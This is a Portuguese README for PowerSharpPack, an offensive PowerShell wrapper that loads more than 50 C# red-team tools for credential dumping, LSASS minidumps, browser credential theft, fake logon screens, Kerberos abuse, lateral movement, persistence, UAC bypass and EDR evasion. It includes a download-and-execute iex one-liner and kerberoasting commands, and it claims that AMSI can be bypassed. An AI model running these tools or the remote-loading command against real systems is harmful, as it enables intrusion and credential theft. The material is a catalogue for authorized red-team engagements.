
Wrapper do PowerShell que agrupa mais de 50 ferramentas ofensivas de segurança em C# para pós-exploração, escalonamento de privilégios, extração de credenciais, movimento lateral e reconhecimento do Active Directory em engajamentos de red team.
Muitos projetos ofensivos úteis em CSharp empacotados em PowerShell para fácil uso.
Por quê? Na minha opinião pessoal, o PowerShell ofensivo não está morto por causa de AMSI, Script-block-logging, Modo de Linguagem Restrita ou outros recursos de proteção. Qualquer um desses mecanismos pode ser contornado. Como a maioria dos novos projetos inovadores de segurança ofensiva são escritos em C#, decidi torná-los utilizáveis também no PowerShell.
Então, o que eu basicamente fiz aqui?
[System.Reflection.Assembly]::Load($DecompressedDecodedBinary).É um processo muito fácil, mas demorado para muitos repositórios.
Quais ferramentas estão incluídas?
Internalmonologue
Ataque de Monólogo Interno: Recuperando Hashes NTLM sem Tocar no LSASS
@Crédito para: https://github.com/eladshamir/Internal-Monologue
Seatbelt
Seatbelt é um projeto C# que realiza uma série de "verificações de segurança" orientadas a host, relevantes tanto para perspectivas ofensivas quanto defensivas.
@Crédito para: https://github.com/GhostPack/Seatbelt
SharpWeb
Projeto .NET 2.0 CLR para recuperar credenciais salvas do navegador do Google Chrome, Mozilla Firefox e Microsoft Internet Explorer/Edge.
@Crédito para: https://github.com/djhohnstein/SharpWeb
UrbanBishop
Cria uma seção RW local no UrbanBishop e então mapeia essa seção como RX em um processo remoto. Carregamento de shellcode facilitado.
@Crédito para: https://github.com/FuzzySecurity/Sharp-Suite
SharpUp
SharpUp é uma porta em C# de várias funcionalidades do PowerUp.
@Crédito para: https://github.com/GhostPack/SharpUp
Rubeus
Rubeus é um conjunto de ferramentas C# para interação e abuso de Kerberos puro.
@Crédito para: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/
SharPersist
Kit de persistência do Windows escrito em C#.
@Crédito para: https://github.com/fireeye/SharPersist
Sharpview
Implementação em C# do PowerView do harmj0y
@Crédito para: https://github.com/tevora-threat/SharpView
winPEAS
Verifique a lista de escalonamento de privilégio local do Windows do book.hacktricks.xyz
@Crédito para: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Lockless
Lockless permite copiar arquivos bloqueados.
@Crédito para: https://github.com/GhostPack/Lockless
SharpChromium
Projeto .NET 4.0 CLR para recuperar dados do Chromium, como cookies, histórico e logins salvos.
@Crédito para: https://github.com/djhohnstein/SharpChromium
SharpDPAPI
SharpDPAPI é uma porta em C# de algumas funcionalidades do Mimikatz DPAPI.
@Crédito para: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/
SharpShares
Enumera todos os compartilhamentos de rede no domínio atual. Também pode resolver nomes para endereços IP.
@Crédito para: https://github.com/djhohnstein/SharpShares
SharpSniper
Encontra usuários específicos no Active Directory através de seu nome de usuário e endereço IP de logon.
@Crédito para: https://github.com/HunnicCyber/SharpSniper
SharpSpray
SharpSpray é um conjunto simples de código para realizar um ataque de spray de senha contra todos os usuários de um domínio usando LDAP e é compatível com Cobalt Strike.
@Crédito para: https://github.com/jnqpblc/SharpSpray
Watson
Enumera KBs ausentes e sugere explorações para vulnerabilidades úteis de escalonamento de privilégio.
@Crédito para: https://github.com/rasta-mouse/Watson
Grouper2
Encontra vulnerabilidades na Política de Grupo do AD.
@Crédito para: https://github.com/l0ss/Grouper2
Tokenvator
Uma ferramenta para elevar privilégios com Tokens do Windows.
@Crédito para: https://github.com/0xbadjuju/Tokenvator
SauronEye
Ferramenta de busca para encontrar arquivos específicos contendo palavras específicas, ex: arquivos contendo senhas.
@Crédito para: https://github.com/vivami/SauronEye
Basta carregar o script principal com
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')
e escolha a ferramenta como parâmetro switch, por exemplo:
PowerSharpPack -seatbelt -Command "AMSIProviders"
Se você quiser passar vários parâmetros para o binário, basta usar aspas como:
PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"
Se você não quiser carregar todos os binários por razões, pode usar os scripts PowerShell por binário localizados na pasta PowerSharpBinaries.
Projetos que também estão disponíveis como script PowerShell autônomo:
SharpCloud
Simples C# para verificar a existência de arquivos de credenciais relacionados a AWS, Microsoft Azure e Google Compute.
@Crédito para: https://github.com/chrismaddalena/SharpCloud
SharpSSDP
Descoberta de Serviço SSDP
@Crédito para: https://github.com/rvrsh3ll/SharpSSDP
DAFT
DAFT: Database Audit Framework & Toolkit
@Crédito para: https://github.com/NetSPI/DAFT
Get-RBCD-Threaded
Ferramenta para descobrir caminhos de ataque de Delegação Restrita Baseada em Recursos em ambientes Active Directory.
@Crédito para: https://github.com/FatRodzianko/Get-RBCD-Threaded
SharpGPO-RemoteAccessPolicies
Uma ferramenta C# para enumerar políticas de acesso remoto através da política de grupo.
@Crédito para: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies
SharpAllowedToAct
Tomada de controle de objeto de computador através de Delegação Restrita Baseada em Recursos (msDS-AllowedToActOnBehalfOfOtherIdentity).
@Crédito para: https://github.com/pkb1s/SharpAllowedToAct
WireTap
Projeto .NET 4.0 para interagir com hardware de vídeo, áudio e teclado.
@Crédito para: https://github.com/djhohnstein/WireTap
SharpClipboard
Monitor de Área de Transferência em C#
@Crédito para: https://github.com/slyd0g/SharpClipboard
SharpPrinter
Descobrir Impressoras + verificar vulnerabilidades.
@Crédito para: https://github.com/rvrsh3ll/SharpPrinter
SharpHide
Ferramenta para criar chaves de registro ocultas.
@Crédito para: https://github.com/outflanknl/SharpHide
SpoolSample
Ferramenta PoC para coagir hosts Windows a autenticar em outras máquinas através da interface RPC MS-RPRN. Isso também é possível através de outros protocolos.
@Crédito para: https://github.com/leechristensen/SpoolSample
SharpGPOAbuse
SharpGPOAbuse é um aplicativo .NET escrito em C# que pode ser usado para tirar proveito dos direitos de edição de um usuário em um Objeto de Política de Grupo (GPO) para comprometer os objetos controlados por esse GPO.
@Crédito para: https://github.com/FSecureLABS/SharpGPOAbuse
SharpDump
SharpDump é uma porta em C# da funcionalidade Out-Minidump.ps1 do PowerSploit.
@Crédito para: https://github.com/GhostPack/SharpDump
SharpHound3
Coletor de Dados C# para o Projeto BloodHound, Versão 3
@Crédito para: https://github.com/BloodHoundAD/SharpHound3
PostDump
Outra ferramenta para realizar minidump do processo LSASS usando algumas técnicas para evitar detecção.
@Crédito para: https://github.com/YOLOP0wn/POSTDump
SharpLocker
SharpLocker ajuda a obter credenciais do usuário atual exibindo uma tela de bloqueio falsa do Windows; toda saída é enviada para o Console, o que funciona perfeitamente para o Cobalt Strike.
@Crédito para: https://github.com/Pickfordmatt/SharpLocker
Eyewitness
EyeWitness foi projetado para tirar screenshots de sites, fornecer algumas informações de cabeçalho do servidor e identificar credenciais padrão, se possível.
@Crédito para: https://github.com/FortyNorthSecurity/EyeWitness
FakeLogonScreen
Tela de logon falsa do Windows para roubar senhas.
@Crédito para: https://github.com/bitsadmin/fakelogonscreen
P0wnedShell
PowerShell Runspace Post Exploitation Toolkit
@Crédito para: https://github.com/Cn33liz/p0wnedShell
Safetykatz
SafetyKatz é uma combinação de uma versão ligeiramente modificada do projeto Mimikatz do @gentilkiwi e do .NET PE Loader do @subTee. Modifiquei esta novamente com minha própria versão ofuscada do Mimikatz.
@Crédito para: https://github.com/GhostPack/SafetyKatz
InveighZero
Ferramenta de spoofing/man-in-the-middle em C# para Windows para LLMNR/mDNS/NBNS/DNS/DHCPv6 .
@Crédito para: https://github.com/Kevin-Robertson/InveighZero
SharpSploit
SharpSploit é uma biblioteca .NET de pós-exploração escrita em C#.
@Crédito para: https://github.com/cobbr/SharpSploit
Snaffler
Uma ferramenta para pentesters ajudar a encontrar doces deliciosos, por @l0ss e @Sh3r4 ( Twitter: @/mikeloss e @/sh3r4_hax ).
@Crédito para: https://github.com/SnaffCon/Snaffler
BadPotato
Printspoofer do itm4n em C#.
@Crédito para: https://github.com/BeichenDream/BadPotato
BetterSafetyKatz
Fork do SafetyKatz que busca dinamicamente a versão pré-compilada mais recente do Mimikatz diretamente do repositório GitHub do gentilkiwi, corrige assinaturas em tempo de execução e usa SharpSploit DInvoke para carregar PE na memória.
@Crédito para: https://github.com/Flangvik/BetterSafetyKatz
SharpKatz
Porta em C# dos comandos sekurlsa::logonpasswords, sekurlsa::ekeys e lsadump::dcsync do mimikatz.
@Crédito para: https://github.com/b4rtik/SharpKatz
Gopher
Ferramenta C# para descobrir frutos baixos.
@Crédito para: https://github.com/EncodeGroup/Gopher
SharpOxidResolver
IOXIDResolver do AirBus Security/PingCastle.
@Crédito para: https://github.com/vletoux/pingcastle/
SharpBlock
Um método para contornar as DLLs de projeção ativa do EDR impedindo a execução do ponto de entrada.
@Crédito para: https://github.com/CCob/SharpBlock
SharpLoginPrompt
Este programa cria um prompt de login para coletar nome de usuário e senha do usuário atual. Este projeto permite que a equipe vermelha phishing nome de usuário e senha do usuário atual sem tocar no lsass e sem ter credenciais de administrador no sistema.
@Crédito para: https://github.com/shantanu561993/SharpLoginPrompt
ThunderFox
Recupera dados (contatos, emails, histórico, cookies e credenciais) do Thunderbird e Firefox.
@Crédito para: https://github.com/V1V1/SharpScribbles
StickyNotesExtract
Extrai dados do banco de dados do Sticky Notes do Windows. Funciona no Windows 10 Build 1607 e superior. Este projeto não depende de dependências externas.
@Crédito para: https://github.com/V1V1/SharpScribbles
SCShell
Ferramenta de movimento lateral sem arquivo que depende do ChangeServiceConfigA para executar comandos.
@Crédito para: https://github.com/Mr-Un1k0d3r/SCShell
SharpSecDump
Porta .Net da funcionalidade de dump remoto de SAM + LSA Secrets do secretsdump.py do impacket.
@Crédito para: https://github.com/G0ldenGunSec/SharpSecDump
SharpHandler
Este projeto reutiliza handles abertos para lsass para analisar ou fazer minidump do lsass, portanto você não precisa usar seu próprio handle lsass para interagir com ele.
@Crédito para: https://github.com/jfmaes/SharpHandler
SharpRDP
Aplicativo de Console .NET do Protocolo de Área de Trabalho Remota para Execução de Comandos Autenticada.
@Crédito para: https://github.com/0xthirteen/SharpRDP
SharpMove
Projeto .NET para realizar Execução Remota Autenticada.
@Crédito para: https://github.com/0xthirteen/SharpMove
SharpStay
Projeto .NET para instalar Persistência
@Crédito para: https://github.com/0xthirteen/SharpStay
SharpPrintNightmare
Implementação C# do PrintNightmare CVE-2021-1675/CVE-2021-34527
@Crédito para: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare
Certify
Abuso de certificados do Active Directory.
@Crédito para: https://github.com/GhostPack/Certify
Farmer
Farmer é um projeto para coletar hashes NetNTLM em um domínio Windows. Farmer consegue isso criando um servidor WebDAV local que faz com que o Mini Redirector WebDAV autentique de qualquer cliente conectado.
@Crédito para: https://github.com/mdsecactivebreach/Farmer
SharpBypassUAC
Ferramenta C# para bypass de UAC
@Crédito para: https://github.com/FatRodzianko/SharpBypassUAC
StandIn
StandIn é um pequeno toolkit de pós-exploração AD .NET35/45
@Crédito para: https://github.com/FuzzySecurity/StandIn
Carbuncle
Ferramenta para interagir com interop do Outlook durante engajamentos de equipe vermelha
@Crédito para: https://github.com/checkymander/Carbuncle
Whisker
Whisker é uma ferramenta C# para assumir contas de usuário e computador do Active Directory manipulando seu atributo msDS-KeyCredentialLink, efetivamente adicionando "Shadow Credentials" à conta alvo.
@Crédito para: https://github.com/eladshamir/Whisker
SharpLdapRelayScan
Porta C# do LdapRelayScan
@Crédito para: https://github.com/klezVirus/SharpLdapRelayScan
LdapSignCheck
Projeto C# para verificar assinatura LDAP.
@Crédito para: https://github.com/cube0x0/LdapSignCheck
SharpImpersonation
SharpImpersonation - Uma ferramenta de Impersonação de Usuário - via Token ou injeção de Shellcode.
@Crédito para: https://github.com/S3cur3Th1sSh1t/SharpImpersonation
SharpWSUS
SharpWSUS é uma ferramenta CSharp para movimento lateral através do WSUS. Há um blog correspondente (https://labs.nettitude.com/blog/introducing-sharpwsus/) com informações mais detalhadas sobre a ferramenta, caso de uso e detecção.
@Crédito para: https://github.com/nettitude/SharpWSUS
MalSCCM
Esta ferramenta permite abusar de servidores SCCM locais ou remotos para implantar aplicativos maliciosos nos hosts que eles gerenciam. Para usar esta ferramenta, seu processo atual deve ter direitos de administrador sobre o servidor SCCM. Tipicamente, as implantações do SCCM terão o servidor de gerenciamento e o servidor primário no mesmo host; nesse caso, o host retornado pelo comando locate pode ser usado como servidor primário.
@Crédito para: https://github.com/nettitude/MalSCCM
KrbRelay
Framework para retransmissão Kerberos
@Crédito para: https://github.com/cube0x0/KrbRelay
SharpSCCM
Um utilitário C# para interagir com SCCM
@Crédito: https://github.com/Mayyhem/SharpSCCM
ShadowSpray
Uma ferramenta para pulverizar Shadow Credentials por todo um domínio na esperança de abusar de DACLs GenericWrite/GenericAll há muito esquecidas sobre outros objetos no domínio.
@Crédito: https://github.com/Dec0ne/ShadowSpray
Grouper3
Encontre vulnerabilidades na Política de Grupo do AD, mas faça melhor do que o Grouper2 fez.
@Crédito para: https://github.com/Group3r/Group3r
HandleKatz
Dumper PIC de lsass usando handles clonados
@Crédito para: https://github.com/codewhitesec/HandleKatz
NanoDump
Despeje o LSASS como manda o figurino
@Crédito para: https://github.com/helpsystems/nanodump
PPLDump
Despeje a memória de um PPL com um exploit em userland
@Crédito para: https://github.com/itm4n/PPLdump